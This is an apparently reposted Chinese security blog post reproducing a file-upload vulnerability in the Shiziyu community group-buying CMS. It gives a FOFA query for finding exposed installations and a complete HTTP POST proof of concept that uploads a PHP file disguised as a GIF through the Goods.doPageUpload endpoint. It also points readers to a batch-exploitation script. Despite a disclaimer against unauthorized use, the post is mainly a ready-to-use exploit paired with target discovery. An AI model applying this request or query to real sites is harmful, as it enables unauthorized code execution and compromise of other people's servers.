漏洞复现-狮子鱼社区团购系统CMS

admin

101400
文章

87
评论

2021年5月11日01:20:501 800 views字数 944阅读3分8秒阅读模式

免责声明：

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本文作者不为此承担任何责任。切勿用于未授权测试！本文主要来自日常学习记录！

FOFA语句：
"/seller.php?s=/Public/login"

利用poc：

POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 214Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundary8UaANmWAgM4BqBSsContent-Disposition: form-data; name="upfile"; filename="Test.php"Content-Type: image/gif
<?php echo('Test');?>------WebKitFormBoundary8UaANmWAgM4BqBSs--

漏洞复现-狮子鱼社区团购系统CMS

脚本批量：

漏洞复现-狮子鱼社区团购系统CMS

获取脚本回复：狮子鱼文件上传

本文始发于微信公众号（Fight Tigers Team）：漏洞复现-狮子鱼社区团购系统CMS

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞复现-狮子鱼社区团购系统CMS

PentestDB各种数据库的利用姿势

干货 | 支付金额类漏洞挖掘技巧总结

记一次价格500rmb的短信轰炸

【相关分享】内网信息收集

如何构建自己的自定义 C2 框架

如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法

深信服防火墙AF策略路由如何配置？

【OSCP】gigachad

CVE-2024-0015复现 (DubheCTF DayDream)

《生成式人工智能服务安全基本要求》原文参阅

发表评论